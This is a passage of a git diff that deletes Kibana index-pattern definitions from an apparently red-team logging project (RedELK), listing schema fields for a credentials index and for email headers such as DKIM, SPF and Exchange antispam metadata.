"count": 0, - "esTypes": [ - "keyword" - ], - "name": "infra.log.type.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "infra.log.type" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "input.type", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "input.type.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "input.type" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "log.file.path", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "log.file.path.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "log.file.path" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "log.offset", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "message", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "message.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "message" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "tags", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tags.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "tags" - } - }, - "type": "string" - } - ], - "timeFieldName": "@timestamp", - "title": "credentials-*" - }, - "coreMigrationVersion": "7.16.3", - "id": "credentials", - "migrationVersion": { - "index-pattern": "7.11.0" - }, - "references": [], - "sort": [ - 1642171858664, - 19 - ], - "type": "index-pattern", - "version": "1" - } -] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_email.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_email.json deleted file mode 100644 index c715ea9e..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_email.json +++ /dev/null @@ -1,2842 +0,0 @@ -[ - { - "attributes": { - "fields": [ - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "@timestamp", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "@version", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "@version.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "@version" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_id" - ], - "name": "_id", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_index" - ], - "name": "_index", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "name": "_score", - "readFromDocValues": false, - "scripted": false, - "searchable": false, - "type": "number" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "_source" - ], - "name": "_source", - "readFromDocValues": false, - "scripted": false, - "searchable": false, - "type": "_source" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_type" - ], - "name": "_type", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "accept-language", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "accept-language.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "accept-language" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "arc-authentication-results", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "arc-authentication-results.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "arc-authentication-results" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "arc-message-signature", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "arc-message-signature.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "arc-message-signature" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "arc-seal", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "arc-seal.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "arc-seal" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "attackscenario", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "attackscenario.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "attackscenario" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "authentication-results", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "authentication-results-original", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "authentication-results-original.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "authentication-results-original" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "authentication-results.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "authentication-results" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "content-language", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "content-language.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "content-language" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "content-transfer-encoding", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "content-transfer-encoding.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "content-transfer-encoding" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "content-type", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "content-type.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "content-type" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "date", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "date.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "date" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "dkim-signature", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "dkim-signature.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "dkim-signature" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "text", - "keyword" - ], - "name": "emailfolder", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "emailfolder.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "emailfolder" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "feedback-id", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "feedback-id.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "feedback-id" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "from", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "from.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "from" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "in-reply-to", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "in-reply-to.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "in-reply-to" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "infra.attack_scenario", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "infra.log_type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "infralogtype", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "infralogtype.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "infralogtype" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "message", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "message-id", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "message-id.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "message-id" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "message.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "message" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "mime-version", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "mime-version.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "mime-version" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "received", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "received-spf", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "received-spf.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "received-spf" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "received.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "received" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "references", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "references.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "references" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "return-path", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "return-path.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "return-path" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "subject", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "subject.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "subject" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "thread-index", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "thread-index.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "thread-index" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "thread-topic", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "thread-topic.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "thread-topic" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "to", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "to.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "to" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-account-notification-type", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-account-notification-type.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-account-notification-type" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-eopattributedmessage", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-eopattributedmessage.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-eopattributedmessage" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-eoptenantattributedmessage", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-eoptenantattributedmessage.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-eoptenantattributedmessage" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-forefront-antispam-report-untrusted", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-forefront-antispam-report-untrusted.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-forefront-antispam-report-untrusted" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-gm-message-state", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-gm-message-state.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-gm-message-state" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-google-dkim-signature", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-google-dkim-signature.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-google-dkim-signature" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-google-smtp-source", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-google-smtp-source.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-google-smtp-source" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-incomingheadercount", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-incomingheadercount.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-incomingheadercount" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-incomingtopheadermarker", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-incomingtopheadermarker.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-incomingtopheadermarker" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-message-delivery", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-message-delivery.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-message-delivery" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-message-info", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-message-info.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-message-info" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-microsoft-antispam", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-microsoft-antispam-mailbox-delivery", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-microsoft-antispam-mailbox-delivery.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-microsoft-antispam-mailbox-delivery" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-microsoft-antispam-message-info", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-microsoft-antispam-message-info-original", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-microsoft-antispam-message-info-original.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-microsoft-antispam-message-info-original" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-microsoft-antispam-message-info.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-microsoft-antispam-message-info" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-microsoft-antispam-prvs", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-microsoft-antispam-prvs.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-microsoft-antispam-prvs" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-microsoft-antispam-untrusted", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-microsoft-antispam-untrusted.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-microsoft-antispam-untrusted" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-microsoft-antispam.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-microsoft-antispam" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-antispam-messagedata", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-antispam-messagedata-original", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-antispam-messagedata-original.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-antispam-messagedata-original" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-antispam-messagedata.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-antispam-messagedata" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-authentication-results", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-authentication-results.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-authentication-results" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-crosstenant-authas", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-crosstenant-authas.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-crosstenant-authas" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-crosstenant-authsource", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-crosstenant-authsource.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-crosstenant-authsource" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-crosstenant-fromentityheader", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-crosstenant-fromentityheader.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-crosstenant-fromentityheader" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-crosstenant-id", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-crosstenant-id.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-crosstenant-id" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-crosstenant-network-message-id", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-crosstenant-network-message-id.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-crosstenant-network-message-id" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-crosstenant-originalarrivaltime", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-crosstenant-originalarrivaltime.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-crosstenant-originalarrivaltime" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-crosstenant-originalattributedtenantconnectingip", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-crosstenant-originalattributedtenantconnectingip.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-crosstenant-originalattributedtenantconnectingip" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-crosstenant-rms-persistedconsumerorg", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-crosstenant-rms-persistedconsumerorg.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-crosstenant-rms-persistedconsumerorg" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-eopdirect", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-eopdirect.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-eopdirect" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-minimumurldomainage", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-minimumurldomainage.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-minimumurldomainage" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "x-ms-exchange-organization-authas", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "x-ms-exchange-organization-authas.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "x-ms-exchange-organization-authas" - } - }, - "type": "string" - }, 